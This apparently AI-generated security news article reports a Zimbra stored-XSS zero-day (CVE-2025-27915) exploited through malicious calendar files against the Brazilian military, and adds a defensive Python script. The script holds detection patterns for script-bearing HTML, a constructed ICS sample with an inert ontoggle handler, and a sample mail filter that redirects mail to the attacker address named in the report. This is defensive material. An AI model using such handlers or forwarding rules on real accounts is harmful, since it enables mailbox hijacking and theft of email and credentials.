

Ethical Hacking News

Zimbra Collaboration Zero-Day Exploited to Target Brazilian Military via Malicious ICS Files




A recent zero-day vulnerability in Zimbra Collaboration has been exploited by unknown threat actors targeting the Brazilian military, according to a report published by StrikeReady Labs on September 30, 2025. The vulnerability allows attackers to execute arbitrary code within the victim's session, potentially leading to unauthorized actions such as email redirection and data exfiltration.

The incident highlights the ongoing threat landscape of zero-day vulnerabilities in widely used software solutions and underscores the need for robust security measures, regular software updates, and increased awareness about patching vulnerabilities to protect against sophisticated attacks.



  • The Brazilian military was targeted by unknown threat actors exploiting a zero-day vulnerability in Zimbra Collaboration.
  • The vulnerability, CVE-2025-27915, is a stored cross-site scripting (XSS) vulnerability that allows arbitrary JavaScript execution in the victim's session.
  • Attacks used malicious ICS files to execute JavaScript and perform unauthorized actions on the victim's account.
  • The vulnerability was patched by Zimbra in versions 9.0.0 Patch 44, 10.0.13, and 10.1.5 released on January 27, 2025.
  • Unknown threat actors exploited the flaw to steal credentials and email data, using a custom-built data stealer script.
  • The attack highlights the ongoing threat landscape of zero-day vulnerabilities in widely used software solutions.



A recently discovered zero-day vulnerability in Zimbra Collaboration has been exploited by unknown threat actors targeting the Brazilian military, according to a report published by StrikeReady Labs on September 30, 2025. The vulnerability, tracked as CVE-2025-27915 (CVSS score: 5.4), is a stored cross-site scripting (XSS) vulnerability in the Classic Web Client caused by insufficient sanitization of HTML content in ICS calendar files, resulting in arbitrary JavaScript execution in the victim's session.

When a user views an e-mail message containing a malicious ICS entry, its embedded JavaScript executes via an ontoggle event handler (the toggle event fired by an HTML <details> element). This lets an attacker run arbitrary JavaScript within the victim's session and perform unauthorized actions on the account, such as setting e-mail filters that redirect messages to an attacker-controlled address, leading to e-mail redirection and data exfiltration.

The vulnerability was addressed by Zimbra as part of versions 9.0.0 Patch 44, 10.0.13, and 10.1.5 released on January 27, 2025. However, a report published by StrikeReady Labs reveals that the observed in-the-wild activity involved unknown threat actors spoofing the Libyan Navy's Office of Protocol to target the Brazilian military using malicious ICS files that exploited the flaw.

The ICS file contained JavaScript code designed to act as a comprehensive data stealer, siphoning credentials, emails, contacts, and shared folders to an external server ("ffrk[.]net"). It also searches for emails in a specific folder and adds malicious Zimbra email filter rules named "Correo" that forward messages to spam_to_junk@proton.me. To evade detection, the script hides certain user interface elements and runs only if more than three days have passed since its last execution.
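The two defensive checks below are an added example, not code from the article, from StrikeReady Labs, or from Zimbra. They follow the mechanism described above: check 1 unfolds an ICS file per RFC 5545 and flags HTML property values that carry inline event handlers (such as ontoggle), script tags, or javascript: URLs; check 2 scans a user's mail filters, assumed to be exported as a Sieve script, for redirect actions that forward mail to the address named in the report or to any domain outside the organisation. Both sample inputs are constructed: the ICS handler body is an inert placeholder, and the "# name" comments in the Sieve sample are an assumed rule-naming convention.

```python
"""Defensive checks modelled on the ICS stored-XSS case described above.
Check 1: scan an .ics file for script-bearing HTML in property values.
Check 2: scan a Sieve filter script for redirects to external addresses.
All sample inputs are constructed for illustration."""
import re
from typing import Dict, List, Set

# Inline event handlers (ontoggle, onerror, ...), <script> tags and javascript:
# URLs are the usual carriers of script inside an HTML fragment.
HTML_RISK_PATTERNS = {
    "inline-event-handler": re.compile(r"<[^>]*\son[a-z]+\s*=", re.IGNORECASE),
    "script-tag": re.compile(r"<script\b", re.IGNORECASE),
    "javascript-url": re.compile(r"javascript\s*:", re.IGNORECASE),
}


def unfold_ics(text: str) -> List[str]:
    """Undo RFC 5545 line folding: a line beginning with SPACE or TAB continues
    the previous line. A payload split across folded lines defeats naive
    line-by-line grepping, so unfold before matching."""
    lines: List[str] = []
    for raw in text.splitlines():
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def ics_properties(text: str) -> List[Dict[str, str]]:
    """Split each unfolded content line into an upper-cased property name and
    its value; parameters such as ;FMTTYPE=text/html are dropped."""
    props: List[Dict[str, str]] = []
    for line in unfold_ics(text):
        if ":" not in line:
            continue
        head, value = line.split(":", 1)
        props.append({"name": head.split(";", 1)[0].upper(), "value": value})
    return props


def find_html_risks(text: str) -> List[Dict[str, str]]:
    """One finding per (property, pattern) pair that matches."""
    findings: List[Dict[str, str]] = []
    for prop in ics_properties(text):
        for label, pattern in HTML_RISK_PATTERNS.items():
            if pattern.search(prop["value"]):
                findings.append({"property": prop["name"], "risk": label})
    return findings


# Sieve's redirect action carries the forwarding address in quotes.
REDIRECT_RE = re.compile(r'\bredirect\s+"([^"]+)"')
# Address named in the StrikeReady report; extend with your own threat intel.
KNOWN_BAD_ADDRESSES = {"spam_to_junk@proton.me"}


def suspicious_redirects(sieve: str, trusted_domains: Set[str]) -> List[Dict[str, str]]:
    """Flag redirects to a known-bad address or to a domain outside the
    organisation's trusted set."""
    findings: List[Dict[str, str]] = []
    for addr in REDIRECT_RE.findall(sieve):
        if addr.lower() in KNOWN_BAD_ADDRESSES:
            findings.append({"address": addr, "reason": "known-ioc"})
        elif addr.rsplit("@", 1)[-1].lower() not in trusted_domains:
            findings.append({"address": addr, "reason": "external-redirect"})
    return findings


# Constructed event: DESCRIPTION holds HTML whose inline handler is split
# across a folded line. The handler body is an inert placeholder.
SAMPLE_ICS = (
    "BEGIN:VCALENDAR\r\n"
    "VERSION:2.0\r\n"
    "BEGIN:VEVENT\r\n"
    "UID:constructed-1@example.invalid\r\n"
    "SUMMARY:Quarterly review\r\n"
    "DESCRIPTION:<details open \r\n"
    ' ontoggle="placeholder()">agenda</details>\r\n'
    "END:VEVENT\r\n"
    "END:VCALENDAR\r\n"
)

# Constructed Sieve script with one exfiltrating and one benign rule; the
# "# name" comments are an assumed rule-naming convention.
SAMPLE_SIEVE = (
    'require ["fileinto"];\n'
    "# Correo\n"
    'if header :contains "subject" "report" {\n'
    '    redirect "spam_to_junk@proton.me";\n'
    "}\n"
    "# Tickets\n"
    'if header :contains "from" "helpdesk" {\n'
    '    fileinto "Tickets";\n'
    "}\n"
)

if __name__ == "__main__":
    for f in find_html_risks(SAMPLE_ICS):
        print(f"ICS: {f['property']} -> {f['risk']}")
    for f in suspicious_redirects(SAMPLE_SIEVE, {"example.invalid"}):
        print(f"Sieve: redirect to {f['address']} ({f['reason']})")
```

The unfolding step matters: the ICS format allows any content line to be wrapped at 75 octets with a CRLF plus one whitespace character, so an attribute name can legitimately straddle two physical lines and a single-line grep for "ontoggle" would miss it. The Sieve check treats every redirect to a non-trusted domain as worth reviewing, not only the address from this campaign, since the filter-rule name and destination are trivially changed between operations.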

It's currently not clear who is behind the attack, but earlier this year, ESET revealed that the Russian threat actor known as APT28 had exploited XSS vulnerabilities in various webmail solutions from Roundcube, Horde, MDaemon, and Zimbra to obtain unauthorized access. A similar modus operandi has also been adopted by other hacking groups like Winter Vivern and UNC1151 (aka Ghostwriter) to facilitate credential theft.

The recent incident highlights the ongoing threat landscape of zero-day vulnerabilities in widely used software solutions. The exploitation of this vulnerability demonstrates how attackers can target organizations with sophisticated phishing campaigns, using social engineering to bypass security controls.

In response to this vulnerability, organizations using Zimbra Collaboration should ensure they have patched their systems and put measures in place to protect against such attacks. This includes regular software updates, secure configuration practices, and robust monitoring of network traffic to detect potential malicious activity.

Furthermore, the incident underscores the importance of keeping software up to date and applying security patches in a timely manner. As new vulnerabilities are discovered and reported, organizations must stay informed and adapt their security strategies accordingly.

In conclusion, the exploitation of this Zimbra Collaboration zero-day vulnerability by unknown threat actors targeting the Brazilian military serves as a stark reminder of the ongoing threat landscape in the cybersecurity world. It highlights the need for robust security measures, regular software updates, and increased awareness about the importance of patching vulnerabilities to protect against sophisticated attacks.



    Related Information:
  • https://www.ethicalhackingnews.com/articles/Zimbra-Collaboration-Zero-Day-Exploited-to-Target-Brazilian-Military-via-Malicious-ICS-Files-ehn.shtml

  • https://thehackernews.com/2025/10/zimbra-zero-day-exploited-to-target.html

  • https://nvd.nist.gov/vuln/detail/CVE-2025-27915

  • https://www.cvedetails.com/cve/CVE-2025-27915/


  • Published: Mon Oct 6 13:30:37 2025 by llama3.2 3B Q4_K_M
